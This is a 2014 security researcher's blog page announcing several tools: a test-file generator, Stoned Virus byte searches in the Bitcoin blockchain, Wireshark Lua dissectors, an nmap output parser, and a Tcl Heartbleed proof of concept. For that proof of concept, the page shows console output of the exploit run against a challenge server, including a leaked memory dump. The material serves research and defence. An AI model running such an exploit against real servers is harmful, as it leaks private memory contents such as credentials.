Didier Stevens

Monday 11 August 2014

EICARgen: An Arms Race

Filed under: My Software — Didier Stevens @ 0:01

If you subscribed to my videos, you saw this video and had early access to my new version of EICARgen.

Version 1.0 of EICARgen is detected by too many AV as a dropper. So I rewrote the code. If you launch the new EICARgen (version 2.0) without any arguments, it does nothing.

You have to provide argument “write” for it to write the EICAR test file to disk. By default this is eicar.com, but you can still provide a filename as second argument.

And I’ve added 2 new files: zip and pdf. Use argument zip and eicar.zip is written, use pdf and eicar.pdf is written.

Here is the VirusTotal detection for eicargen.exe.

EICARgen_V2_0.zip (https)
MD5: D346A3725622F981DDA7221799EF08E8
SHA256: 2DF76319D8513B1AD70D327816D3C1028B261EF1E314243DCD0DEC14FF1FC7CE

Thursday 24 July 2014

Stoned Bitcoin: My Analysis Tools

Filed under: Encryption,Forensics,Malware,My Software — Didier Stevens @ 0:00

The most interesting thing about Stoned Bitcoin for me, was to work out a method to find these Bitcoin transactions.

When this was mentioned on Twitter, I did a string search through the Bitcoin blockchain for string STONED: no hits.

Some time later I used my find-file-in-file tool. I got a copy of the Stoned Virus (md5 74A6DBB7A60915FE2111E580ACDEEAB7) and searched through the blockchain: again, no hits.

Although this means the blockchain doesn’t contain the start bytes of the Stoned Virus, it could still contain other parts of the virus. So I randomly selected a sequence of bytes from the virus, and used my tool again: I got a hit!

The command: find-file-in-file.py -s 0xFC 74A6DBB7A60915FE2111E580ACDEEAB7.vir blk00129.dat

The output:

0171c33d 00000010 (6%)
Remaining 244 (93%)

These are the bytes I found: 07 00 BA 80 00 CD 13 EB 49 90 B9 03 00 BA 00 01

How to find the transaction containing this byte sequence? A Bitcoin transaction (binary form) starts with a version number (unsigned 32 bit integer, little-endian), this number is currently 1. The ID of a transaction is the SHA-256 hash of the SHA-256 hash of all the bytes in the transaction, and this reversed and expressed in hexadecimal notation. Armed with this information, I was able to find the transaction: f09904aaa4fa4a8ec7da06f5e3d318a9b6a218e1a215f9307416fbbadf5a1c8e.

Finally, I updated my find-file-in-file tool so that I could do partial searches (and a couple of other features), and I wrote a Python script to parse and search the Bitcoin blockchain.

This is what you can do with the new version of find-file-in-file:

20140723-234257

Option partial allows you to search for parts of the file.

Option hexdump does a hexdump of the found bytes.

And options rangebegin and rangeend allow you to limit what you are searching for by specifying the range to search for. This is necessary for the Stoned Virus, because it ends with a sequence of 0x00 bytes, and such sequences are certainly not specific to the Stoned Virus, but omni-present in the blockchain.

Soon I will release these tools.

Wednesday 16 July 2014

Update: translate.py

Filed under: My Software,Update — Didier Stevens @ 19:37

Some time ago, Chris John Riley reminded me of a program I had written, published … and forgotten: translate.py. Apparently, it is used in SANS classes.

Looking at this program from 2007, I though: my Python coding style has changed since then, I need to rewrite this.

So here is the new version. It’s backward compatible with the old version (same arguments), but it offers more flexibility, like input/output redirection, allowing it to be used in pipes.

And from now on, I’m going to try to add a man page to all new Python program releases. It’s embedded in the source code, and you view it like this: translate.py –man

20140716-212254

Monday 16 June 2014

Wireshark-export

Filed under: 010 Editor,My Software — Didier Stevens @ 0:37

Here is the 010 Editor script I developed to generate Wireshark hex dumps.

Watch how to use it in my previous blogpost: “Packet Class: Wireshark – Import Hex Dump”.

wireshark-export_v0_0_1.zip (https)
MD5: B339EFD0898B6506CBEAAFCBCE08B3A6
SHA256: 557B39246FAC3BD91CE24EAD3DF07F8B68100778241393A26C67A566756C404B

Tuesday 10 June 2014

Packet Class: Wireshark – Import Hex Dump

Filed under: 010 Editor,My Software,Wireshark — Didier Stevens @ 20:34

During my “Packet Class: Wireshark” training, we do an exercise on importing a hex dump in Wireshark.

I recently created a 010 Editor script to help with the creation of hex dumps for Wireshark.

This video shows its usage:

Tuesday 3 June 2014

WhoAmI: status-4-evar

Filed under: My Software — Didier Stevens @ 12:05

Remember my WhoAmI Firefox add-on? I developed it because I use different profiles: it displays the name of the current profile on the status bar.

But with Firefox 29, the status bar has disappeared (once again). You can restore the status bar with add-on status-4-evar.

Monday 28 April 2014

TCP Flags for Wireshark

Filed under: My Software,Networking,Wireshark — Didier Stevens @ 20:03

This is a topic I’m teaching in my “Packet Class: Wireshark” training in Amsterdam next month.

20140404-112631

You can configure Wireshark to display TCP flags like Snort does. One way to do this, is to create a post-dissector and then add a column with its output (like in the screenshot above).

I developed a Wireshark Lua dissector generator. You provide it some definitions, like this:

[dissector]
file_prefix = tcp-flags
type = postdissector
description = Wireshark Lua tcp-flags postdissector example

[protocol]
proto = tcpflags
description = TCP Flags Postdissector

[protocolfields]
field_1 = flags
description_a_1 = TCP Flags
description_b_1 = The TCP Flags

[fields]
field_1 = tcp.flags

And then my Python program lua-dissector-generator.py takes this input and generates a Lua post-dissector with one new protocol + field, using an existing field.

--[[
	2014/02/21 - 2014/02/21
	tcp-flags-postdissector.lua V0.0.1
	Wireshark Lua tcp-flags postdissector example

	Source code by Didier Stevens, GPL according to Wireshark Foundation ToS

https://DidierStevens.com

	Use at your own risk

	Shortcommings, or todo's ;-)

	History:
		2014/02/21: start
--]]

local function DefineAndRegister_tcpflags_postdissector()
	local oProto_tcpflags = Proto('tcpflags', 'TCP Flags Postdissector')

	local oProtoFieldflags = ProtoField.string('tcpflags.flags', 'TCP Flags', 'The TCP Flags')

	oProto_tcpflags.fields = {oProtoFieldflags}

	local oField_tcp_flags = Field.new('tcp.flags')

	function oProto_tcpflags.dissector(buffer, pinfo, tree)
		local tcp_flags = oField_tcp_flags()

		if tcp_flags ~= nil then
			local oSubtree = tree:add(oProto_tcpflags, 'TCP Flags')
			oSubtree:add(oProtoFieldflags, tcp_flags.value)
		end
	end

	register_postdissector(oProto_tcpflags)
end

local function Main()
	DefineAndRegister_tcpflags_postdissector()
end

Main()

Finally, we add functions to represent the individual TCP flags:


local function DecodeFlag(flags, mask, character)
	if bit.band(flags, mask) == 0 then
		return '*'
	else
		return character
	end
end

local function TCPFlagIntegerToSnort(tcpflags)
	local s_tcp_flags = ''

	s_tcp_flags = s_tcp_flags .. DecodeFlag(tcpflags, 0x80, 'C')
	s_tcp_flags = s_tcp_flags .. DecodeFlag(tcpflags, 0x40, 'E')
	s_tcp_flags = s_tcp_flags .. DecodeFlag(tcpflags, 0x20, 'U')
	s_tcp_flags = s_tcp_flags .. DecodeFlag(tcpflags, 0x10, 'A')
	s_tcp_flags = s_tcp_flags .. DecodeFlag(tcpflags, 0x08, 'P')
	s_tcp_flags = s_tcp_flags .. DecodeFlag(tcpflags, 0x04, 'R')
	s_tcp_flags = s_tcp_flags .. DecodeFlag(tcpflags, 0x02, 'S')
	s_tcp_flags = s_tcp_flags .. DecodeFlag(tcpflags, 0x01, 'F')

	return s_tcp_flags
end

That’s it. You can download this post-dissector here:
wireshark-lua-dissectors_V0_0_1.zip (https)
MD5: F1F9F1E70CDC5B9931D6086E633698BB
SHA256: B608A83409F2EB3D15155845D4DA5473230DCD970A18AB3DCD28A7C4211478D0

Friday 18 April 2014

Heartbleed: Testing From a Cisco IOS Router – ssltest.tcl

Filed under: My Software,Networking,Vulnerabilities — Didier Stevens @ 9:12

I wanted to know if I could exploit Heartbleed CVE-2014-0160 from a Cisco IOS router. So I wrote a Tcl script based on Jared Stafford’s Python program ssltest.py.

Turns out I can:

router#tclsh ssltest.tcl                         
Opening connection

Translating "cloudflarechallenge.com"...domain server (8.8.8.8) [OK]
Sending handshake
Received TLS record Type: 0x16 Version: 0x0301 First data byte: 0x02 Length: 66
Received TLS record Type: 0x16 Version: 0x0301 First data byte: 0x0b Length: 6113
Received TLS record Type: 0x16 Version: 0x0301 First data byte: 0x0c Length: 331
Received TLS record Type: 0x16 Version: 0x0301 First data byte: 0x0e Length: 4
Sending malformed heartbeat request
Heartbeat response received
Received TLS record Type: 0x18 Version: 0x0301 First data byte: 0x02 Length: 16384
Heartbeat response dump:
02 40 00 6b c1 f4 ab d9  47 45 54 20 2f 20 48 54  .@.kC^AC4B+C^Y GET / HT
54 50 2f 31 2e 31 0d 0a  48 6f 73 74 3a 20 63 6c  TP/1.1.. Host: cl
6f 75 64 66 6c 61 72 65  63 68 61 6c 6c 65 6e 67  oudflare challeng
65 2e 63 6f 6d 0d 0a 43  6f 6e 6e 65 63 74 69 6f  e.com..C onnectio
6e 3a 20 6b 65 65 70 2d  61 6c 69 76 65 0d 0a 0d  n: keep- alive...
0a 2b 14 0d 6a c0 13 32  44 c1 a9 0f bf 5d dc 57  .+..jC^@.2 DC^AB).B?]C^\W
19 18 03 03 00 1b 34 f3  65 6b c1 f4 ab d8 01 ff  ......4C3 ekC^AC4B+C^X.C?
ff a6 8b c5 e2 2a b0 d6  b3 ff bd fc 9c 67 a7 83  C?B&.C^EC"*B0C^V B3C?B=C<.gB'.
40 72 10 38 5e 01 ff ff  f1 ca d2 f6 be 81 23 41  @r.8^.C?C? C1C C^RC6B>.#A
fb 8d 53 15 42 aa 52 bd  9e 5f 61 0a 08 08 08 08  C;.S.BB*RB= ._a.....
08 08 08 08 08 00 19 00  0b 00 0c 00 18 00 09 00  ........ ........
0a 00 16 00 17 00 08 00  06 00 07 00 14 00 15 00  ........ ........
04 00 05 00 12 00 13 00  01 00 02 00 03 00 0f 00  ........ ........
10 00 11 00 23 00 00 00  0f 00 01 01 0e 00 0d 00  ....#... ........
19 00 0b 00 0c 00 18 00  09 00 0a 00 16 00 17 00  ........ ........
08 00 06 00 07 00 14 00  15 00 04 00 05 00 12 00  ........ ........
13 00 01 00 02 00 03 00  0f 00 10 00 11 00 23 00  ........ ......#.
00 00 0d 00 20 00 1e 06  01 06 02 06 03 05 01 05  .... ... ........
02 05 03 04 01 04 02 04  03 03 01 03 02 03 03 02  ........ ........
01 02 02 02 03 00 0f 00  01 01 00 15 00 c2 00 00  ........ .....C^B..
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ........ ........

[omitted]

00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ........ ........
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ........ ........
                                                                   
Closing connection

router#

Tested on: Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.1(4)M3, RELEASE SOFTWARE (fc1)

If you are interested, here is my Tcl PoC ssltest.tcl:
ssltest.zip (https)
MD5: 1B50D6A10637BB6472ED541733BBE68D
SHA256: DA744643CF06645DA9C27A7DD62853E15123D7481AE5D6776E6393A6312847E1

Wednesday 16 April 2014

nmap Grepable Script Output – Heartbleed

Filed under: My Software,Networking — Didier Stevens @ 0:11

Peter was looking for a way to make nmap’s heartbleed script output grepable. He ended up hacking the script.

I propose a method without modification of the NSE heartbleed script.

Some time ago I recommended to include xml output with your nmap scans.

Script output is included with each port element:

20140415-225839

I quickly adapted an old program to produce a Python script to generate a CSV file from XML with one line per host, including only ports with script output (any script, not only ssl-heartbleed).

Like this:

address;vendor;hostname;port;state;service;script;output
10.10.10.10;;heartbleed.local.net;443;open;https;ssl-heartbleed;u'\n  VULNERABLE:\n  The Heartbleed Bug ...'

nmap-xml-script-output_V0_0_1.zip (https)
MD5: 772B6371C1F5E27E68D9BF14955A02D4
SHA256: C86E42E7FA8EFA42C60062759E69DC8DE7F017D9113CF304D9515ACA59815790

Friday 4 April 2014

Announcement: Wireshark Lua Dissectors

Filed under: Announcement,My Software,Networking,Wireshark — Didier Stevens @ 10:18

To promote my Hack In The Box Wireshark training, I’ll start to publish some Lua dissectors.

Here is a screenshot of my TCP Flags dissector. It was generated (and adapted) with my Wireshark Lua dissector generator. It displays TCP flags like Snort does.

You can clearly see the SYN – SYN/ACK – ACK phase of the first TCP connection (packets 1, 2 and 3).

20140404-112631

Next Page »

The Rubric Theme. Blog at WordPress.com.

Follow

Get every new post delivered to your Inbox.

Join 227 other followers